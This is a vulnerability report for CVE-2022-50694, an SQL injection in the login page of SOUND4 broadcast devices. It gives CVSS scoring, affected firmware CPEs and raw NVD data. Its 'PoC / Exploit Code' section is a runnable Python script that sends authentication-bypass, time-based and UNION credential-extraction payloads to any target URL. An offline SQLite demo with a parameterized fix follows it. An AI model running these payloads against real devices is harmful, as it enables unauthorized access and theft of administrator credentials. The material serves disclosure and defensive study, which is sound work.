Security Vulnerability Report
CVE-2022-50694 CVSS 9.8 CRITICAL


Published: 2025-12-30 23:15:45
Last Modified: 2026-01-16 19:16:11

Description

SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an SQL injection vulnerability in the 'username' POST parameter of index.php that allows attackers to manipulate database queries. Attackers can inject arbitrary SQL code through the username parameter to bypass authentication and potentially access unauthorized database information.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-89 (Improper Neutralization of Special Elements used in an SQL Command)
Scoring note
The 9.8 is the NVD primary CVSS v3.1 score: reachable from the network, no privileges or user interaction required, and confidentiality, integrity and availability all rated High. The same record carries a secondary CVSS v4.0 score of 8.8 HIGH (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N), which rates integrity impact Low and availability None. The v4.0 vector matches the described effect (authentication bypass and data disclosure) more closely; treat the v3.1 9.8 as the conservative figure for prioritization.

Configurations (Affected Products)

NVD expresses each match as an AND of a firmware CPE and the hardware CPE it runs on. The hardware entries are flagged "NOT VULNERABLE" only because they are the platform half of that pair, not because those devices are unaffected: a device is affected when it runs one of the listed firmware versions. Only firmware 1.69 and 2.15 have CPE entries, while the description covers every 2.x release and earlier, and there is no CPE entry for the Eco model at all, so do not rely on CPE matching alone when inventorying these devices.

cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE, running on cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:*
cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE, running on cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:*
cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE, running on cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:*
cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE, running on cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:*
cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE, running on cpe:2.3:h:sound4:first:2.0:*:*:*:*:*:*:*

Affected range as stated in the description:
SOUND4 IMPACT <= 2.x
SOUND4 FIRST <= 2.x
SOUND4 PULSE <= 2.x
SOUND4 Eco <= 2.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys
import time

import requests
import urllib3

# CVE-2022-50694 SQL Injection PoC for SOUND4 IMPACT/FIRST/PULSE/Eco
# Target: /index.php (login page)
# Vulnerability: SQL Injection in 'username' POST parameter

# Device web interfaces are usually served with a self-signed certificate; the
# requests below use verify=False, so silence the per-request warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit_sqli(target_url, payload):
    """
    Send one login request with the SQL injection payload in the username field.

    Args:
        target_url: Base URL of the target SOUND4 device
        payload: SQL injection payload to inject

    Returns:
        requests.Response from the server, or None if the request failed
    """
    login_url = f"{target_url.rstrip('/')}/index.php"

    # POST data with the SQL injection payload in the username field
    data = {
        'username': payload,
        'password': 'any_password',
        'submit': 'Login'
    }
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }

    try:
        response = requests.post(login_url, data=data, headers=headers,
                                 timeout=30, verify=False)
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


def test_blind_sqli(target_url):
    """
    Test for blind SQL injection: a time-based probe (MySQL SLEEP) followed by
    a boolean-based login bypass payload.
    """
    # Time-based blind payloads (MySQL syntax): only the true condition should delay
    true_payload = "admin' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1"
    false_payload = "admin' AND (SELECT CASE WHEN (1=2) THEN SLEEP(5) ELSE 0 END) AND '1'='1"

    print("[*] Testing time-based blind SQL injection...")
    timings = {}
    for label, payload in (("true", true_payload), ("false", false_payload)):
        start = time.monotonic()
        response = exploit_sqli(target_url, payload)
        timings[label] = time.monotonic() - start
        status = response.status_code if response else 'n/a'
        print(f"[*] {label} condition: {timings[label]:.2f}s (HTTP {status})")
    # A delay that follows the injected condition is the signal; a slow device
    # on its own delays both requests equally.
    if timings["true"] - timings["false"] >= 4:
        print("[+] Response delay tracks the injected condition: time-based injection likely")

    # Boolean-based authentication bypass payload
    bool_payload = "admin' OR '1'='1' -- "
    print(f"[*] Boolean bypass payload: {bool_payload}")

    response = exploit_sqli(target_url, bool_payload)
    if response and response.status_code == 200:
        print("[+] Payload sent successfully")
        print(f"[+] Response length: {len(response.text)} bytes")
        return True
    return False


def extract_admin_creds(target_url):
    """
    Attempt to extract admin credentials using UNION-based injection.

    The column count (9) and table name ('admin') are guesses; on a real
    target they have to be confirmed first (for example by ORDER BY probing)
    or the UNION errors out.
    """
    union_payload = "admin' UNION SELECT 1,2,3,4,username,password,7,8,9 FROM admin WHERE '1'='1"

    print("[*] Attempting UNION-based injection for credential extraction...")
    response = exploit_sqli(target_url, union_payload)
    if response:
        print(f"[+] Response received: {len(response.text)} bytes")
        # Crude heuristic: a post-login page usually mentions 'admin' or 'dashboard'.
        # The login page itself may contain 'admin', so treat a hit as a lead, not proof.
        if 'admin' in response.text.lower() or 'dashboard' in response.text.lower():
            print("[+] Potential admin access detected!")
            return True
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2022-50694.py <target_url>")
        print("Example: python cve-2022-50694.py http://192.168.1.100")
        sys.exit(1)

    target = sys.argv[1]
    print("[*] CVE-2022-50694 SQL Injection PoC")
    print(f"[*] Target: {target}")
    print("-" * 50)

    # Run tests
    test_blind_sqli(target)
    print("-" * 50)
    extract_admin_creds(target)
    print("\n[!] Disclaimer: This PoC is for authorized testing only")
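The following is an added example, not code from this page or from SOUND4: it reproduces the flaw the description and the PoC above rely on in a self-contained form, so the payloads can be run offline against a vulnerable login and its hardened equivalent. The schema (a single 'admin' table), the in-memory SQLite backend and the two-column lookup used for the UNION case are all assumptions for the demo; the advisory does not say which database engine sits behind index.php, and the PoC's SLEEP() probe is MySQL syntax that SQLite does not have, so the time-based case is not reproduced here.

```python
import sqlite3

# Constructed demo schema: one 'admin' table with one account. This is not the
# SOUND4 database; the real table layout is not public.
DEMO_USER = "admin"
DEMO_PASSWORD = "S3cret!"


def make_db():
    """In-memory SQLite database standing in for the device's login backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin (username, password) VALUES (?, ?)",
                 (DEMO_USER, DEMO_PASSWORD))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern CVE-2022-50694 describes: the POST 'username' value is spliced
    into the query text, so a quote and a comment marker become SQL syntax and
    the password clause is commented away."""
    query = ("SELECT username FROM admin WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Same check with bound parameters: the driver passes the value as data, so
    admin' OR '1'='1' -- is compared literally against the username column."""
    row = conn.execute(
        "SELECT username FROM admin WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def lookup_vulnerable(conn, username):
    """Two-column profile lookup with the same concatenation flaw, used to show
    UNION-based extraction: the attacker's SELECT must match the column count
    (two here, which is why the PoC's nine-column guess must be tuned per target)."""
    query = "SELECT id, username FROM admin WHERE username = '%s'" % username
    return conn.execute(query).fetchall()


def lookup_hardened(conn, username):
    """Parameterized version of the lookup; the UNION text never reaches the parser."""
    return conn.execute(
        "SELECT id, username FROM admin WHERE username = ?", (username,)
    ).fetchall()


# The bypass payload is the PoC's; the UNION payload is adapted to this
# two-column demo table.
BYPASS_PAYLOAD = "admin' OR '1'='1' -- "
UNION_PAYLOAD = "x' UNION SELECT 1, password FROM admin WHERE '1'='1"


def demo():
    """Run both code paths against the same payloads and return the outcomes."""
    conn = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(conn, BYPASS_PAYLOAD, "wrong-password"),
        "hardened_bypass": login_hardened(conn, BYPASS_PAYLOAD, "wrong-password"),
        "hardened_valid_login": login_hardened(conn, DEMO_USER, DEMO_PASSWORD),
        "vulnerable_union": lookup_vulnerable(conn, UNION_PAYLOAD),
        "hardened_union": lookup_hardened(conn, UNION_PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

Running it shows the vulnerable login returning "admin" for the bypass payload with a wrong password and the vulnerable lookup returning the stored password row through the UNION, while both hardened variants return nothing for the same inputs and still accept the real credentials. The fix is the same one that applies to index.php: bind the POST parameters instead of building the query string from them.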

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50694", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:44.723", "lastModified": "2026-01-16T19:16:10.677", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an SQL injection vulnerability in the 'username' POST parameter of index.php that allows attackers to manipulate database queries. Attackers can inject arbitrary SQL code through the username parameter to bypass authentication and potentially access unauthorized database information."}, {"lang": "es", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco &lt;=2.x contiene una vulnerabilidad de inyección SQL en el parámetro POST 'username' de index.php que permite a los atacantes manipular consultas de base de datos. Los atacantes pueden inyectar código SQL arbitrario a través del parámetro 'username' para eludir la autenticación y potencialmente acceder a información no autorizada de la base de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": 
"NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "33C347FE-DA7B-4137-87B8-E6A8AF4D307F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:*", 
"matchCriteriaId": "0A735654-A166-4B56-BF4D-F165B7E11043"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "5C4CF02A-8CF1-46FF-9EC0-FF779D60B6EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC9BD81B-573A-4DA7-AC47-6C8AF1B6B18F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "18E34118-F11B-4BF2-BE23-7DAE0A6790FB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C46BF88C-955C-4F9E-B782-1EADA068F19D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vuln ... (truncated)